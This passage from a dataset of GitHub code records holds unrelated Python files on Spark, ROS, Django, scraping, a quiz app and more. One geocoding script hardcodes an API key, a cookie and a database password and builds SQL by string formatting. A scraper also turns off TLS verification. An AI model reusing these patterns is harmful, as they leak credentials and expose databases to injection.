visitors_table.update_item(Key={\"user_id\": user_id},\n UpdateExpression=\"set query_history=:h\",\n ExpressionAttributeValues={\":h\": query_history})\n return {\n 'statusCode': 200,\n 'body': json.dumps(reply)\n }\n","repo_name":"tonywyb/AIChef","sub_path":"backend/searchRecipe.py","file_name":"searchRecipe.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"41047040218","text":"#!/usr/bin/env python\n\nimport sys\nimport re\nimport json\nfrom operator import add\n\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.sql import SQLContext,Row\nconf=SparkConf().setAppName(\"TransactionEvaluation\")\nsc=SparkContext(conf=conf)\nsqlContext=SQLContext(sc)\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Usage: need two files as parameters 1. Input_StartOfDay_Positions.txt 2. Input_Transactions.txt\", file=sys.stderr)\n sys.exit(-1)\n\n # read Input_StartOfDay_Positions.txt ignoring column header\n lines = sc.textFile(sys.argv[1])\n dataLines = lines.filter(lambda h: \"Instrument\" not in h)\n inpStartDayPosition = dataLines.map(lambda l: l.split(\",\"))\n dfInpStartDayPosition = inpStartDayPosition.toDF([\"Instrument\", \"Account\", \"AccountType\", \"Quantity\"])\n\n # read Input_Transactions.txt\n inpTransactionjsonRDD = sc.wholeTextFiles(sys.argv[2]).map(lambda x : x[1])\n js = inpTransactionjsonRDD.map(lambda x: re.sub(r\"\\s+\", \"\", x, re.UNICODE))\n transactions = sqlContext.jsonRDD(js)\n # Join both datasets and get aggregated transaction value (buy and sell) for complete day.\n transPositionJoin = dfInpStartDayPosition.join(transactions, dfInpStartDayPosition.Instrument == transactions.Instrument, 'leftouter').drop(transactions.Instrument).drop(transactions.TransactionId)\n transPositionJoinAgg = transPositionJoin.groupBy(\"Instrument\",\"Account\",\"AccountType\",\"Quantity\",\"TransactionType\").agg({\"TransactionQuantity\": \"sum\"})\n\n def calculateTransactions(line):\n instrument = line[0]\n account = int(line[1])\n accountType = line[2]\n quantity = int(line[3])\n transactionType = line[4]\n sumTransactionQuantity = line[5]\n if accountType == \"E\" and transactionType == \"B\":\n sumTransactionQuantity = sumTransactionQuantity * -1\n if accountType == \"I\" and transactionType == \"S\":\n sumTransactionQuantity = sumTransactionQuantity * -1\n return (instrument, account, accountType, quantity, sumTransactionQuantity)\n\n transPositionJoinDelta = transPositionJoinAgg.map(calculateTransactions)\n dfTransPositionJoinDelta = transPositionJoinDelta.toDF([\"instrument\", \"account\", \"accountType\", \"quantity\", \"delta\"])\n dfTransPositionJoinDeltaAgg = dfTransPositionJoinDelta.groupBy(\"instrument\", \"account\", \"accountType\", \"quantity\").agg({\"delta\": \"sum\"}).withColumnRenamed(\"sum(delta)\",\"delta\").na.fill(0)\n dfEndofDayPosition = dfTransPositionJoinDeltaAgg.select(dfTransPositionJoinDeltaAgg['instrument'],dfTransPositionJoinDeltaAgg['account'],dfTransPositionJoinDeltaAgg['accountType'],dfTransPositionJoinDeltaAgg['quantity'] - dfTransPositionJoinDeltaAgg['delta'], dfTransPositionJoinDeltaAgg['delta'])\n rddEndofDayPositionAbs = dfEndofDayPosition.map(lambda r : Row(instrument=r[0], account=r[1], accountType=r[2], quantity=r[3], delta=r[4], absDelta=abs(r[4])))\n dfEndofDayPositionAbs = sqlContext.createDataFrame(rddEndofDayPositionAbs)\n dfEndofDayPositionSorted = dfEndofDayPositionAbs.sort(\"absDelta\", ascending=False)\n dfEndofDayPositionSortedOutput = dfEndofDayPositionSorted.select(dfEndofDayPositionSorted['instrument'],dfEndofDayPositionSorted['account'],dfEndofDayPositionSorted['accountType'],dfEndofDayPositionSorted['quantity'],dfEndofDayPositionSorted['delta'])\n dfEndofDayPositionSortedOutput.rdd.map(lambda l: (l[0].encode('ascii', 'ignore'),l[1],l[2].encode('ascii', 'ignore'),l[3],l[4])).saveAsTextFile(\"/user/training/EndofDayPosition_Output.txt\")\n\n #to display largest and lowest net transaction volumes for the day\n print(\"largest & lowest transactions:\", dfEndofDayPositionSortedOutput.head(2))\n\n #sqlContext.stop()\n sys.exit(0)\n","repo_name":"sagarGitcode/SagarKamble_Python","sub_path":"spark_transactions_evaluation.py","file_name":"spark_transactions_evaluation.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5542373178","text":"import requests\nimport json\nimport time\nimport random\nimport pandas as pd\nimport pymysql\n\ndef connection():\n conn = pymysql.connect(\n host='localhost',\n user='root',\n password='admin',\n db='circuit',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor\n )\n return conn\n\n\ndef get_job():\n conn = connection()\n cursor = conn.cursor()\n sql_str = \"SELECT DISTINCT com_name FROM job_shanghai_clean_final_3 WHERE job_address = '上海'\"\n cursor.execute(sql_str)\n results = cursor.fetchall()\n cursor.close()\n conn.close()\n return results\n\ndef get_part_name(org_name):\n url = \"https://restapi.amap.com/v3/place/text\"\n params = {\n 'key': '1f950b2dd2067775c0a1de7be920cda0',\n 'keywords': org_name,\n 'types': '科教文化服务',\n 'city': '上海',\n # 'offset': 10,\n # 'output':'JSON',\n }\n headers = {\n 'Cookie': 'BAIDUID=FBAA261874C5A1FCE6DBA9B6FA4F06B5:FG=1'\n }\n try:\n response = requests.request(\"GET\", url, headers=headers, params=params,timeout=10)\n # print(response.text)\n rs_json = json.loads(response.text)\n # print(rs_json)\n\n part_name = str(rs_json['pois'][0]['adname'])\n # print(part_name)\n # print('所在行政区{}'.format(part_name))\n return part_name\n except Exception as e:\n print(e)\n return ''\n\ndef update_data(com_name, job_address):\n conn = connection()\n cursor = conn.cursor()\n sql = \"update `job_shanghai_clean_final_3` set job_address='{}' where com_name = '{}'\".format(\n job_address, com_name)\n # print(sql)\n cursor.execute(sql)\n conn.commit()\n cursor.close()\n conn.close()\n\ndef main():\n results = get_job()\n print('数据输入完成{}'.format(len(results)))\n i=0\n for rs in results:\n # org_id = row['org_id']\n org_name = rs['com_name']\n if type(org_name) is float:\n print('无中文')\n part_name=''\n else:\n org_name = org_name.strip().replace('。','')\n # lng,lat = get_lng_lat(org_name)\n part_name = get_part_name(org_name)\n if '[' in part_name or part_name =='':\n print('{}找不到地区'.format(org_name))\n part_name = ''\n continue\n part_name = '上海-'+part_name\n print(\"{}是:{}\".format(org_name, part_name))\n # update_date_lng_lat(shop_id,lng,lat)\n # print(lng,lat)\n update_data(org_name, part_name)\n # break\n time.sleep(0.4)\n\nmain()","repo_name":"SherryLee725/circuit_talent_needs","sub_path":"job_place.py","file_name":"job_place.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"14448207170","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\nfrom time import sleep\nimport sys\nsys.path.append('../../classes')\nimport notify\n\n# import ssl\n# ssl._create_default_https_context = ssl._create_unverified_context\n\n\ndef scrape_for_page(url):\n flg = True\n\n print(\"page\\t\" + url)\n\n sleep(1)\n\n r = requests.get(url,verify=False)\n\n # htmlをBeautifulSoupで扱う\n soup = BeautifulSoup(r.text, \"lxml\")\n\n if soup.find(class_=\"view-content\") == None:\n return False\n\n arr_a = soup.find(class_=\"view-content\").find_all(\"a\")\n\n if len(arr_a) > 0:\n for element_a in arr_a:\n\n href = element_a.get(\"href\")\n\n sleep(1)\n\n html = requests.get(\"https://www.iiif.ku-orcas.kansai-u.ac.jp/\"+href,verify=False)\n\n # htmlをBeautifulSoupで扱う\n soup = BeautifulSoup(html.text, \"lxml\")\n\n aas = soup.find_all(\"a\")\n\n manifest = \"\"\n\n for a in aas:\n href = a.get(\"href\")\n if href and \"manifest.json\" in href:\n manifest = href\n break\n\n if manifest != \"\":\n\n print(manifest)\n manifest_arr.append(manifest)\n\n if len(manifest_arr) % 100 == 1:\n notify.Notify.send(\"kansai\\t\"+str(len(manifest_arr)))\n\n else:\n flg = False\n\n return flg\n\n\nif __name__ == '__main__':\n\n manifest_arr = []\n\n output_path = \"data/manifest_list.csv\"\n\n url_array = [\n \"https://www.iiif.ku-orcas.kansai-u.ac.jp/books?page=\", \n \"https://www.iiif.ku-orcas.kansai-u.ac.jp/osaka_gadan?page=\", \n \"https://www.iiif.ku-orcas.kansai-u.ac.jp/hakuen_bunko?page=\", \n \"https://www.iiif.ku-orcas.kansai-u.ac.jp/hakuen_yinpu?page=\"\n ]\n\n for base_url in url_array:\n\n loop_flg = True\n page = 1\n\n while loop_flg:\n url = base_url + str(page)\n\n loop_flg = scrape_for_page(url)\n\n page += 1\n\n f = open(output_path, 'w')\n\n writer = csv.writer(f, lineterminator='\\n')\n writer.writerow([\"Manifest\"])\n\n for manifest in manifest_arr:\n writer.writerow([manifest])\n\n f.close()\n","repo_name":"nakamura196/iiif","sub_path":"src/collections/kansai/createManifestList.py","file_name":"createManifestList.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"34719936881","text":"from PySide6.QtWidgets import QWidget, QLabel, QVBoxLayout, QHBoxLayout, QPushButton, QListWidget, \\\n QInputDialog, QLineEdit\n\nfrom GlobalSettings import global_settings\n\n\nclass SecondaryFolderChooseWidget(QWidget):\n def __init__(self):\n super(SecondaryFolderChooseWidget, self).__init__()\n self.setup_ui()\n\n def setup_ui(self):\n layout_main = QVBoxLayout()\n layout_main.setContentsMargins(0, 0, 0, 0)\n layout_main.setSpacing(0)\n layout_title = QHBoxLayout()\n layout_title.setContentsMargins(0, 0, 0, 0)\n layout_title.setSpacing(0)\n title_label = QLabel(\"需要处理的二级文件夹名称\")\n title_label.setStyleSheet(\"font-size: 15px; color: #000000;\")\n layout_title.addWidget(title_label)\n layout_title.addStretch(1)\n self.add_folder_button = QPushButton(\"添加\")\n self.add_folder_button.setStyleSheet(f\"\"\"\n QPushButton {{\n font-size: 14px;\n color: #000000;\n background-color: #FFFFFF;\n border: 1px solid #000000;\n border-radius: 5px;\n }}\"\"\")\n self.add_folder_button.setFixedSize(60, 30)\n self.add_folder_button.clicked.connect(self.add_folder_button_clicked)\n layout_title.addWidget(self.add_folder_button)\n layout_title.addSpacing(5)\n self.delete_folder_button = QPushButton(\"删除\")\n self.delete_folder_button.setStyleSheet(f\"\"\"\n QPushButton {{\n font-size: 14px;\n color: #000000;\n background-color: #FFFFFF;\n border: 1px solid #000000;\n border-radius: 5px;\n }}\"\"\")\n self.delete_folder_button.setFixedSize(60, 30)\n self.delete_folder_button.clicked.connect(self.delete_folder_button_clicked)\n layout_title.addWidget(self.delete_folder_button)\n layout_main.addLayout(layout_title)\n layout_main.addSpacing(5)\n layout_hint = QHBoxLayout()\n layout_hint.setContentsMargins(0, 0, 0, 0)\n layout_hint.setSpacing(0)\n hint_label = QLabel(\"如输入”同人志“,则所有名称中含有”同人志“的二级文件夹都会被处理。\\n如果此处不输入任何内容,则全部适用是否复制未选二级文件夹设置项。\")\n hint_label.setStyleSheet(\"font-size: 12px; color: #000000;\")\n layout_hint.addWidget(hint_label)\n layout_main.addLayout(layout_hint)\n layout_main.addSpacing(5)\n self.show_list = QListWidget()\n self.show_list.setStyleSheet(\"\"\"\n QListWidget {\n font-size: 12px;\n color: #000000;\n background-color: #7f7f7f;\n border: 2px solid #000000;\n border-radius: 5px;\n outline: none;\n }\n QListWidget::item {\n height: 30px;\n padding: 5px;\n background-color: #aaaaaa;\n }\n QListWidget::item:selected {\n background-color: #dddddd;\n color: #000000;\n }\"\"\")\n for name in global_settings.choose_folder_names:\n self.show_list.addItem(name)\n layout_main.addWidget(self.show_list)\n self.setLayout(layout_main)\n\n def add_folder_button_clicked(self):\n new_path = QInputDialog.getText(self, \"二级文件夹设置\", \"请输入二级文件夹筛选词\", QLineEdit.Normal)\n if new_path[0] and new_path[1]:\n for name in global_settings.choose_folder_names:\n if new_path[0] == name:\n return\n global_settings.choose_folder_names.append(new_path[0])\n self.show_list.clear()\n for name in global_settings.choose_folder_names:\n self.show_list.addItem(name)\n\n def delete_folder_button_clicked(self):\n if self.show_list.currentItem() is None:\n return\n global_settings.choose_folder_names.remove(self.show_list.currentItem().text())\n self.show_list.clear()\n for name in global_settings.choose_folder_names:\n self.show_list.addItem(name)\n","repo_name":"Overseer-Council/handleComicCollection","sub_path":"Widgets/SecondaryFolderChoose.py","file_name":"SecondaryFolderChoose.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"6670018486","text":"# 덧칠하기\ndef solution(n, m, section):\n answer = 0\n l = 0\n\n for i in section:\n if i <= l:\n continue\n l = i + m - 1\n answer += 1\n\n return answer\n\nprint(solution(8, 4, [2, 3, 6]))","repo_name":"surpmh/algorithms","sub_path":"Programmers/level1/161989.py","file_name":"161989.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12260193456","text":"#!/usr/bin/env python3\r\nimport rospy\r\nfrom std_msgs.msg import String\r\nfrom geometry_msgs.msg import Twist\r\nfrom Motors import MotorLib\r\n\r\n\r\nmotors = MotorLib.Motors()\r\n\r\ndef callback(data):\r\n rospy.loginfo(\"Received Command: {0}\\n{1}\".format(data.linear, data.angular))\r\n x = data.linear.x\r\n w = data.angular.z\r\n if (w == 0):\r\n if (x>0):\r\n motors.forward(x*10)\r\n else:\r\n motors.backward(-x*10)\r\n else:\r\n if (w>0):\r\n motors.left(w*10)\r\n else:\r\n motors.right(-w*10)\r\n\r\ndef listener():\r\n rospy.init_node('firefighter_velReceiver', anonymous=True)\r\n\r\n rospy.Subscriber(\"firefighter/cmd_vel\", Twist, callback)\r\n rospy.loginfo(\"Initialised Node\")\r\n # spin() simply keeps python from exiting until this node is stopped\r\n rospy.spin()\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n listener()\r\n except rospy.ROSInterruptException:\r\n pass\r\n finally:\r\n motors.exit()\r\n print(\"Finished Operation\")\r\n\r\n \r\n\r\n \r\n","repo_name":"csmithcripps/controller_firefighter","sub_path":"scripts/velReceiver.py","file_name":"velReceiver.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45489534916","text":"import numpy as np\nfrom tqdm import tqdm\nfrom gensim.models import Word2Vec\nfrom nltk.tokenize import sent_tokenize\n\nfrom data_preprocessor import DataPreprocessor\n\n\nclass Word2VecWrapper:\n\n def __init__(self):\n self.data_preprocessor = DataPreprocessor()\n self.model = None\n\n def fit(self, data):\n sentences = self.data_preparing(data)\n self.model = Word2Vec(sentences, vector_size=500, window=5, min_count=5, epochs=10)\n\n def transform(self, data):\n sentences = self.data_preparing(data)\n embedded_sentences = np.array([])\n for sentence in tqdm(sentences):\n vector = [self.model.wv[word] for word in sentence\n if word in list(self.model.wv.key_to_index.keys())]\n if vector:\n vector = np.mean(vector, axis=0)\n embedded_sentences = vector if embedded_sentences.size == 0 else np.vstack((embedded_sentences, vector))\n return embedded_sentences\n\n def data_preparing(self, data):\n return [self.data_preprocessor.run_pipeline(sent) for sent in sent_tokenize(' '.join(data), 'russian')]\n","repo_name":"answerIII/Chatbot","sub_path":"src/word2vec.py","file_name":"word2vec.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9963719044","text":"with open(\"inputs/09.txt\", \"r\") as f:\n data=f.read().strip()\nlines = data.split(\"\\n\")\n\ndef move_tail(r1,r2):\n (x,y),(xt,yt) = r1, r2\n dx_abs, dy_abs = abs(x-xt), abs(y-yt)\n if dx_abs>1:\n xt = xt-1 if x0:\n yt = yt-1 if y1:\n yt = yt-1 if y0:\n xt = xt-1 if x.\n'''\n\nimport os\nimport re\nimport sys\nimport time\nfrom pathlib import Path\n#from struct import pack, unpack\n\n# TODO: relative import. fix this latter.\nsys.path.append(\".\")\nfrom py import lsh\n\n\n\ndef parse_tc(path):\n parsed_tc = ''\n with open(path, 'r') as fin:\n line = fin.readline()\n while line:\n if line != \"\\n\":\n newline = line.strip()\n parsed_tc += newline + \" \"\n line = fin.readline()\n parsed_tc = re.sub(' +', ' ', parsed_tc.strip())\n return parsed_tc\n\n\n# TODO: store a single pickle file for each test\ndef preprocess_test_cases(inputdir, outputdir, singlefile=True):\n if singlefile:\n with open(JTeC_preproc_single, 'w') as fout, open(JTeC_preproc_map, 'w') as mapfile:\n for path in Path(JTeC_dir).rglob('*.java'): # java files\n tc = parse_tc(path) # parses the test files to remove line breaks and empty lines\n fout.write(tc + '\\n')\n mapfile.write(str(path.relative_to(JTeC_dir)) + '\\n')\n else:\n tcID = 1\n with open(JTeC_preproc_map, 'w') as mapfile:\n for path in Path(JTeC_dir).rglob('*.java'): # java files\n outfile = os.path.join(JTeC_preproc_dir, '{}.txt'.format(tcID))\n with open(outfile, 'w') as fout:\n tc = parse_tc(path) # parses the test files to remove line breaks and empty lines\n fout.write(tc)\n mapfile.write(str(path.relative_to(JTeC_dir)) + '\\n')\n tcID += 1\n \n\n# TODO: skip preprocessing if already done\ndef storeSignatures():\n mh_t = time.perf_counter() \n with open(mapfileloc, 'w') as mapfile, open(sigfileloc, 'w') as sigfile:\n for path in Path(JTeC_dir).rglob('*.java'): # java files\n tc = parse_tc(path) # parses the test files to remove line breaks and empty lines\n tc_shingles = set()\n for i in range(len(tc) - k + 1):\n tc_shingles.add(hash(tc[i:i + k])) \n sig = lsh.tcMinhashing((None, set(tc_shingles)), hashes)\n\n #print(sig)\n\n for hash_ in sig:\n #sigfile.write(repr(unpack('>d', hash_)[0]))\n sigfile.write(hash_)\n sigfile.write(\" \")\n sigfile.write(\"\\n\")\n\n mapfile.write(str(path.relative_to(JTeC_dir)) + '\\n')\n mh_time = time.perf_counter() - mh_t\n with open(sigtimefileloc, \"w\") as fout:\n fout.write(repr(mh_time)) \n\n\n\nif __name__ == '__main__':\n #JTeC_dir = '/home/breno/research/JTEC/JTeC-Bundle/JTeC/'\n JTeC_dir = 'scalability/input/JTeC'\n mapfileloc = 'scalability/input/JTeC_map.txt'\n sigfileloc = 'scalability/input/JTeC.sig'\n sigtimefileloc = 'scalability/input/JTeC_sigtime.txt'\n #-----\n JTeC_preproc_dir = 'scalability/input/JTeC_preproc'\n JTeC_preproc_single = 'scalability/input/JTeC_preproc_all.txt'\n JTeC_preproc_map = 'scalability/input/JTeC_preproc_all_map.txt'\n\n if not os.path.exists(JTeC_preproc_dir):\n os.makedirs(JTeC_preproc_dir)\n\n # TODO: add all FAST parameters in a config file\n # FAST parameters\n k, n, r, b = 5, 10, 1, 10\n\n hashes = [lsh.hashFamily(i) for i in range(n)]\n\n #storeSignatures()\n \n preprocess_test_cases(JTeC_dir, JTeC_preproc_dir, singlefile=True)\n #preprocess_test_cases(JTeC_dir, JTeC_preproc_dir, singlefile=False)","repo_name":"Liviocsouza/FAST","sub_path":"tools/prepare-scalability-input.py","file_name":"prepare-scalability-input.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"6332872713","text":"\"\"\"project URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom django.urls import path, re_path, include\nfrom time import sleep\n\n\ndef sample_api_view(request):\n from django.http import JsonResponse\n\n sleep(2)\n return JsonResponse(\n {\n \"message\": \"\"\"This message is coming from the backend.\n The django view is inside `project/urls.py` and the redux code is in `react-app/src/js/welcome/(actions|reducers).js`.\n Please remove them when starting your project :]\"\"\"\n }\n )\n\n\nfrontend_urls = [\n re_path(r\"^.*$\", TemplateView.as_view(template_name=\"frontend/index.html\")),\n]\n\n\nif not settings.DEBUG:\n frontend_urls.insert(0, path(\"\", include(\"pwa.urls\")))\n\n# if you wish to test the PWA on dev, uncomment the following lines,\n# so that django serves static files.\n# remember to built the frontend manually and run collectstatic as well.\n# from django.views.static import serve\n# frontend_urls += [\n# re_path(r'^static/(?P.*)$', serve, {'document_root': settings.STATIC_ROOT})\n# ]\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path(\"api/sample-api-view/\", sample_api_view),\n] + frontend_urls\n","repo_name":"labcodes/django-react-boilerplate","sub_path":"project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"77"} +{"seq_id":"28236063166","text":"# Escape sequence\ntabby_cat = \"\\tI'm tabbed in.\"\npersian_cat = \"I'm split\\non a line.\"\n# \\n stands for ASCII linefeed.\n\nbackslash_cat = \"I'm \\\\ a \\\\ cat.\"\n# \\\\ symbolieses backslash.\n\nfat_cat = \"\"\"\nI'll do a list:\n\\t* Cat food\n\\t* Fishies\n\\t* catnip\\n\\t* Grass\n\"\"\"\n# \\t symbolises horizontal tab (TAB)\n\nprint(tabby_cat)\nprint(persian_cat)\nprint(backslash_cat)\nprint(fat_cat)\n\n# test a few escape sequence below:\nbackslash = \"\\\\ backslash\"\nsingle_quote = \"\\' single-quote\"\ndouble_quote = \"\\\" double-quote\"\nASCII_bell = \"\\a ASCII bell\"\nASCII_backspace = \"\\b ASCII backspace\"\nASCII_formfeed = \"\\f ASCII Formfeed\"\nASCII_linefeed = \"\\n ASCII Linefeed\"\nCarriage_return = \"\\r Carriage return\"\nHorizontal_return = \"\\t Horizontal return\"\nASCII_vertical_tab = \"\\v ASCII vertical tab\"\n\nprint(backslash)\nprint(single_quote)\nprint(double_quote)\nprint(ASCII_bell)\nprint(ASCII_backspace)\nprint(ASCII_formfeed)\nprint(ASCII_linefeed)\nprint(Carriage_return)\nprint(Horizontal_return)\nprint(ASCII_vertical_tab)\nprint('''\nHow will it appear\nIf I change double-quotes\ninto single-quotes?\n''')\n# as far as it appears,\n# three single-quotes serve as the same thing as three double-quotes.\n# Am I right?\n\nanswer = \"\"\"\n\\b\\\"I do not have any apple, but I have other stuff.\\\"\n\\t* Pineaplle\\n\\t* Banana\\n\\t* Pear\\n\\t* Orange\\n\\t* Tomato\\r\n\\\"So do you want any of these?\\\"\n\"\"\"\n\nprint('Mc\\'Donalds asked: \"How many apples do you have?\"')\nprint(f\"Irvin answerd: {answer}\")\nprint(\"What a sad story!\")\n","repo_name":"espererwyd/PythonFile","sub_path":"ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30198477392","text":"import streamlit as slt\n\n# import requests\n# from bs4 import BeautifulSoup\n\n# baseUrl = \"http://gepia.cancer-pku.cn/detail.php\"\n# query = {\"gene\": \"ERBB2\", \"tag\": \"expdiy\"}\n\n# res = requests.post(url=baseUrl, data=query)\n# # response.text\n# # slt.markdown(response.text[17:], unsafe_allow_html=True)\n# # response.text[17:]\n# soup = BeautifulSoup(res.text, \"html.parser\")\n# soup.current_data\n# with open(\"temp.html\", \"wb\") as fout:\n# fout.write(res.content)\n\nimport gepia\n\nbp = gepia.boxplot()\nslt.text(str(bp.showParams()))\n\nslt.write(gepia.CANCERType)\nbp.setParam(\"dataset\", gepia.CANCERType)\nresult = bp.query()\n\n# IFrame(result, width=500, height=500)\n","repo_name":"TeddyHuang-00/Bioinformatics-Lab","sub_path":"hw7/cancer.py","file_name":"cancer.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"9991355992","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom .models import *\nfrom django.template.defaulttags import register\n# Create your views here.\nfrom quiz.dto import *\nfrom quiz.services import *\nimport re\nimport copy\n@register.filter\ndef get_answer_with_uuid(value):\n uuid = 1\n result = []\n for a in value:\n result.append({\"answer\":a,\"uuid\":uuid})\n uuid+=1\n return result\n\n\n@register.filter\ndef check_old_answer(uuid,cookies):\n for a in cookies:\n print(a)\n if a == \"uuid\"+str(uuid):\n b = cookies.get(a).split(\" \")\n buffer = []\n for a in b:\n try:\n buffer.append(int(a))\n except Exception:\n pass\n return buffer\n\n\ndef start(request):\n\n ren = render(request, \"start.html\")\n for a in request.COOKIES:\n ren.delete_cookie(a)\n return ren\n\n\ndef questions(request, number):\n def save_result():\n '''\n Записывает переданные пользователем значения в cookie\n '''\n def get_form_request_get():\n '''\n функция возврощает результат ответа пользователя\n '''\n result = \"\"\n if request.GET.get(\"previous\") != None:\n return result\n result = \" \"\n for a in request.GET:\n if a != \"previous\":\n result += str(a)+\" \"\n return result\n if get_form_request_get() != \"\":\n questions_render.set_cookie(\"uuid\"+str(int(number)-1), get_form_request_get())\n new_question_url = {\"have\": False, \"url\": \"\"}\n old_question_url = {\"have\": False, \"url\": \"\"}\n def check_new_question_url(new_question_url):\n '''\n функция возвращает url на новый вопрос если такое возможно\n '''\n try:\n Question.objects.get(uuid=int(number)+1)\n return {\"have\": True, \"url\":\"/questions_\"+str(int(number)+1), }\n except Exception:\n pass\n\n def check_old_question_url(old_question_url):\n '''\n функция возвращает url на старый вопрос если такое возможно\n '''\n try:\n Question.objects.get(uuid=int(number)-1)\n return {\"have\": True, \"url\":\"/questions_\"+str(int(number)-1),}\n except Exception:\n pass\n\n try:\n question = Question.objects.get(uuid = int(number))\n answer = Choice.objects.filter(Question = question)\n new_question_url = check_new_question_url(new_question_url)\n old_question_url = check_old_question_url(old_question_url)\n except Exception as e:\n def check_last_number():\n '''\n функция возвращает в виде числа последний\n записанный uuid ответа пользователя\n '''\n last_count = \"\"\n max = 0\n for b in request.COOKIES:\n last_count = re.findall(r\"[0-9]{1,3}\", b)\n if int(last_count[0])>int(max):\n max = copy.copy(last_count[0])\n return int(max)\n result_user = \"\"\n for a in request.GET:\n result_user += a + \" \"\n count = check_last_number() + 1\n request.COOKIES['uuid' + str(count)] = result_user\n return result(request)\n\n\n context = {\n \"question\":question,\n \"answer\":answer,\n \"new_question_url\":new_question_url,\n \"old_question_url\":old_question_url,\n 'cookies':request.COOKIES\n }\n questions_render = render(request, 'questions.html', context)\n save_result()\n return questions_render\n\ndef result(request):\n def answer():\n '''\n функция возвращает словарь типа AnswersDTO\n с ответами пользователя считанного из куки\n '''\n list_AnswersDTO = []\n #записываем последний ответ на вопрос\n for a in request.COOKIES:\n try:\n number = re.findall(r\"[0-9]{1,3}\", a)\n one_answer = request.COOKIES.get(\"uuid\"+number[0])\n list_AnswersDTO.append(AnswerDTO(question_uuid=number,\n choices = re.findall(r\"[0-9]{1,3}\", one_answer)))\n except Exception:\n pass\n return list_AnswersDTO\n\n def question():\n '''\n функция возвращает словарь типа QuestionDTO\n с всеми вопросами\n '''\n # заполянме ChoiceDTO и Question\n list_QuestionDTO = []\n for a in Question.objects.all():\n list_ChoiceDTO = []\n count_list_ChoiceDTO = 1\n for b in Choice.objects.filter(Question = a):\n list_ChoiceDTO.append(ChoiceDTO(uuid = str(count_list_ChoiceDTO),\n text = b.text,\n is_correct=b.is_correct))\n count_list_ChoiceDTO += 1\n list_QuestionDTO.append(QuestionDTO(uuid = str(a.uuid),\n text = a.text,\n choices = list_ChoiceDTO))\n return list_QuestionDTO\n quiz = QuizResultService(QuizDTO(\n uuid = \"1\",\n title = \"Тест по теме язык python\",\n questions = question()),\n AnswersDTO(\n quiz_uuid = \"1\",\n answers = answer(),\n ))\n\n return render(request, \"finish.html\", {\n \"result\": str(quiz.get_result()),\n })","repo_name":"severmen/simbirsoft_test-task","sub_path":"quiz_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22969137369","text":"from big_vision.pp import utils\nfrom big_vision.pp.registry import Registry\nimport numpy as np\nimport tensorflow as tf\n\n\n@Registry.register(\"preprocess_ops.rgb_to_grayscale_to_rgb\")\n@utils.InKeyOutKey(indefault=\"image\", outdefault=\"image\")\ndef get_rgb_to_grayscale_to_rgb():\n def _rgb_to_grayscale_to_rgb(image):\n return tf.image.grayscale_to_rgb(tf.image.rgb_to_grayscale(image))\n return _rgb_to_grayscale_to_rgb\n\n\n@Registry.register(\"preprocess_ops.nyu_eval_crop\")\ndef get_nyu_eval_crop():\n \"\"\"Crops labels and image to valid eval area.\"\"\"\n # crop_h = slice(45, 471)\n # crop_w = slice(41, 601)\n crop_h_start = 54\n crop_h_size = 426\n crop_w_start = 41\n crop_w_size = 560\n\n def _pp(data):\n tf.debugging.assert_equal(tf.shape(data[\"labels\"]), (480, 640, 1))\n tf.debugging.assert_equal(tf.shape(data[\"image\"]), (480, 640, 3))\n data[\"labels\"] = tf.slice(data[\"labels\"],\n [crop_h_start, crop_w_start, 0],\n [crop_h_size, crop_w_size, -1])\n data[\"image\"] = tf.slice(data[\"image\"],\n [crop_h_start, crop_w_start, 0],\n [crop_h_size, crop_w_size, -1])\n return data\n return _pp\n\n\n@Registry.register(\"preprocess_ops.nyu_depth\")\n@utils.InKeyOutKey(indefault=\"depth\", 